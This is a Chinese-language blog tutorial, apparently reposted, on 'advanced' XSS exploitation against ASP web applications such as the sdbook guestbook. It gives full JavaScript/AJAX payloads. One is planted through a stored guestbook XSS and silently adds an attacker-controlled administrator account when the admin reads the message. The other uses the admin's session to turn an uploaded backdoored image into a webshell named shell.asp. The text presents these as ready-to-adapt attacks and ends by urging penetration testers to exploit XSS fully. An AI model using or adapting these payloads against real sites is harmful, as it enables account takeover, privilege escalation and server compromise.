xss植入_xss的高级利用
以往對XSS的利用大多數都是針對于掛馬,釣魚,盜cookie等,這些方式并沒有真正發揮到XSS的作用,因為很少人能了解XSS的實質,會話劫持,瀏覽器劫持,XSS能做到的東西遠遠超乎我們的想象。之前本站的一篇文章《深掘XSS漏洞場景之XSS Rootkit》也可以為各位讀者提供參考。
一 XSS下提升權限?????? 隨著AJAX技術在許多大型SNS網站的應用,XSS也變得愈加流行,在XSS場景下運用AJAX能更有效地發揮它的作用。
用戶輸入的地方最容易滋生XSS,譬如留言、評論等表單,我搭建了一個sdbook的留言本,因為sdbook沒有對用戶輸入的變量作出合適的過濾,導致一個XSS的產生。
留言率先傳遞給管理員,當作javascript劫持,我們就可以利用管理員的權限做任何事情,例如添加一個管理員。
在留言內容輸入跨站代碼:
這段代碼用來加載遠程的JS,而xss.js的內容是利用xmlHttp對象發送一個異步請求,通過XMLHTTP無刷新提交到服務器端,模擬添加一個管理員。
先用Firebug監視網絡傳輸的情況,主要是獲取添加admin時post的數據。
然后構造ajax代碼
xss.js代碼:
var request = false;
if(window.XMLHttpRequest) {
request = new XMLHttpRequest();
if(request.overrideMimeType) {
request.overrideMimeType(‘text/xml’);
}
} else if(window.ActiveXObject) {
var versions = [‘Microsoft.XMLHTTP’, ‘MSXML.XMLHTTP’, ‘Microsoft.XMLHTTP’, ‘Msxml2.XMLHTTP.7.0′,’Msxml2.XMLHTTP.6.0′,’Msxml2.XMLHTTP.5.0’, ‘Msxml2.XMLHTTP.4.0’, ‘MSXML2.XMLHTTP.3.0’, ‘MSXML2.XMLHTTP’];
for(var i=0; i
try {
request = new ActiveXObject(versions[i]);
} catch(e) {}
}
}
xmlhttp=request;
add_admin();
function add_admin(){
var url=”/sdbook/admin/AdminUser/adminUser_Add.asp“;
var params =”UserName=cnryan&password1=123456&password2=123456Purview=%B9%DC%C0%ED%D4%B1&Submit=%CC%E1%BD%BB“;
xmlhttp.open(“POST”, url, true);
xmlhttp.setRequestHeader(“Content-type”, “application/x-www-form-urlencoded”);
xmlhttp.setRequestHeader(“Content-length”, params.length);
xmlhttp.setRequestHeader(“Connection”, “close”);
xmlhttp.send(params);
}
當admin查看帶有XSS的留言時,就會在后臺悄悄地添加一個管理員,帳戶為cnryan,密碼是123456,最后我們就能獲得整個網站用戶的最高權限。
再來了解下這個留言本的場景,最初只有admin可以查看留言,也就只有admin受到XSS,當內容通過審核,發布到網站,此時所有的web瀏覽用戶都有可能受到XSS,我們能獲得更多的會話劫持,利用這些會話甚至可能對服務器發起XSS DOS。
二 XSS獲取webshell
為什么要用AJAX,首先它夠隱秘,也就是所謂的“無刷新”,其次,它能更有效地迅速處理各種復雜多變的數據。
了解到以上例子的流程與代碼,你是否會有不一樣的想法呢?
我們不防想一想如何把網站的webshell拿下。
這里有兩點必要的條件,前者是在其后臺要有一定拿shell的功能,如備份數據庫,向配置信息插馬等,后者是我們要知道如網站路徑,默認數據庫等信息,對于許多網站都是存在這些缺陷的。
以備份數據庫拿webshell為例,這個站點有上傳頭像的權限,并記錄我們的地址:UploadFace20090901.jpg,圖片寫有后門,然 后在白盒的測試環境下記錄POST的數據,構造AJAX代碼寫入遠程的JS,最后在該站的XSS點植入JS。
其代碼如下:
var request = false;
if(window.XMLHttpRequest) {
request = new XMLHttpRequest();
if(request.overrideMimeType) {
request.overrideMimeType(‘text/xml’);
}
} else if(window.ActiveXObject) {
var versions = [‘Microsoft.XMLHTTP’, ‘MSXML.XMLHTTP’, ‘Microsoft.XMLHTTP’, ‘Msxml2.XMLHTTP.7.0′,’Msxml2.XMLHTTP.6.0′,’Msxml2.XMLHTTP.5.0’, ‘Msxml2.XMLHTTP.4.0’, ‘MSXML2.XMLHTTP.3.0’, ‘MSXML2.XMLHTTP’];
for(var i=0; i
try {
request = new ActiveXObject(versions[i]);
} catch(e) {}
}
}
xmlhttp=request;
getshell();
function getshell(){
var postStr =”DBpath=UploadFace%5C20090901.jpg&bkfolder=Databackup&bkDBname=shell.asp“;
xmlhttp.open(“POST”, “/ADMIN_data.asp?action=BackupData&act=Backup“, true);
xmlhttp.setRequestHeader(“Content-type”, “application/x-www-form-urlencoded”);
xmlhttp.setRequestHeader(“Content-length”, postStr.length);
xmlhttp.setRequestHeader(“Connection”, “close”);
xmlhttp.send(postStr);
}
上述代碼是我測試一個開源程序寫的,不同的程序不盡相同,但大體相似。
getshell()函數的作用就是把UploadFace20090901.jpg備份為Databackup目錄下的shell.asp。
一切利用的前提就是該站具有XSS,并能成功把構造代碼注入到后臺,只要管理員不經意觸發了這個xss Trap,我們就能拿到webshell。
三 基于開源的Xss Hacking
以上事例都是在針對于白盒環境下測試的,很多問題都是基于理論的,在真實環境下利用XSS滲透是會有一定的難度,但仍是有辦法的,XSS的核心在于靈活多變,這也是它倍受追捧的原因,關于XSS滲透可以去看jianxin的文章。
XSS熱潮已至,相信各位滲透師,跨站師們勢必會把XSS的威力發揮到極致。
總結
以上是生活随笔為你收集整理的xss植入_xss的高级利用的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: eclipse打包项目为aar_Ecli
- 下一篇: antd 函数组件_React - 组件